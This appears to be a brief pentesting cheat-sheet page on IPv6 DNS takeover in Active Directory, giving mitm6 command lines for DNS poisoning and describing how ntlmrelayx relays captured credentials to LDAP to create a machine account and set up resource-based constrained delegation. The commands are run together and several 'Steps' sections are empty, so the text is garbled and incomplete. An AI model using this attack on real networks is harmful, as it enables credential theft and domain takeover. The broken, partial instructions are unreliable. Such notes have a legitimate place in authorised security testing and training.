IPv6 DNS Takeover
Essentially, we become Man-in-the-Middle using IPv6
Tools: mitm6, ntlmrelayx
DNS Poisoning - Relay delegation with mitm6
Tool: https://github.com/dirkjanm/mitm6
Requirements
mitm6 -i interface_to_use -d domain.local -hw target.domain.local -vmitm6 -i interface_to_use -d domain.local -hw target.domain.local --relay CA.domain.local -vntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it.
Steps
Now granting delegation rights and then do a RBCD
Steps:
Last updated